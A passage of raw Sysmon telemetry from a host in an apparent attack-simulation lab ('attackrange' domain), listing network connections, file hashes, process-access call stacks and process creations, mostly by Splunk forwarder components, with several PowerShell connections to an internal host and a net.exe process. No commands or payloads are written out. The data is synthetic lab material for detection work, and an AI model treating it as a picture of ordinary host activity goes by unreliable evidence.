18:15:01.593{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56697-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085101Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:37.865{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AEC9D4B8FED0FE2690823C2C0E5C7D6,SHA256=44A20ED1F0D4702EAA7637A4A875ABEE3EC3A09D265DDF842CE05A7B3F602713,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085105Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:38.869{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19970E8B4BDCD35B949EF202D61A0FB9,SHA256=E470DCC9B3EB57F61BBE67E1F94D2F18544847A539C6ADA8D0E72D56D8502812,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085104Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:38.401{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085103Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:38.401{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=35EE875FCA887EB56F2CF40FB13F6B01,SHA256=27FA5FB7568F0DDADABA6D5F4570FA3068C68782125F4ACBC420C88804F8733C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085107Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:04.124{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56698-false10.0.1.12-8000- 23542300x800000000000000035085106Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:39.915{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=637661A8B457408BCC76210B086818E6,SHA256=72410925848A096FCD482ACFD6B7476AE9B94E06EF17AFE6878C8404BC0EA598,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085108Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:40.945{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDD92E51693B2B5F19D4CC2D4A6161CB,SHA256=D68E9C0C8D14E156D0FBC6BE44C2AD7854CA4935FB53348C74A2F9278604C05C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000035085110Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:14:41.681{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7a5a6-0x8f3a0fe7) 23542300x800000000000000035085109Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:41.597{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4C83F92EC40EC941C0CDF0AC83DDD89A,SHA256=4AC71DB3A485A13413D10A43DF191300487144F41075FF9AA4BD4994833F4B0E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085112Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:06.606{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56699-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085111Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:42.044{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F48C6F6802063817F16DDBAAD32181B,SHA256=69F6E5C22A1D9243B4C93F3B3FE85184D6B6134E443A3FA1294ED94FE00A184D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085122Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:43.761{B81B27B7-4F13-613A-5590-03000000C801}9647036C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085121Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:43.564{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F13-613A-5590-03000000C801}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085120Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:43.564{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085119Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:43.564{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085118Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:43.564{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085117Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:43.564{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085116Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:43.564{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4F13-613A-5590-03000000C801}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085115Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:43.564{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F13-613A-5590-03000000C801}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085114Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:43.559{B81B27B7-4F13-613A-5590-03000000C801}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085113Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:43.061{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C964B59E0D674BC5C1BE73A39660CC19,SHA256=3334A6DCB7BA9B11CD45A0530DF65FD35703A0FABD6067A94BAAE036D11478C1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085151Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.926{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F14-613A-5890-03000000C801}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085150Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.926{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085149Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.926{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085148Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.926{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085147Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.926{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085146Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.926{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4F14-613A-5890-03000000C801}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085145Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.926{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F14-613A-5890-03000000C801}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085144Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.911{B81B27B7-4F14-613A-5890-03000000C801}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035085143Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:09.135{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56700-false10.0.1.12-8000- 10341000x800000000000000035085142Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.611{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-4F14-613A-5790-03000000C801}4948C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085141Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.611{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085140Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.611{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085139Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.611{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085138Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 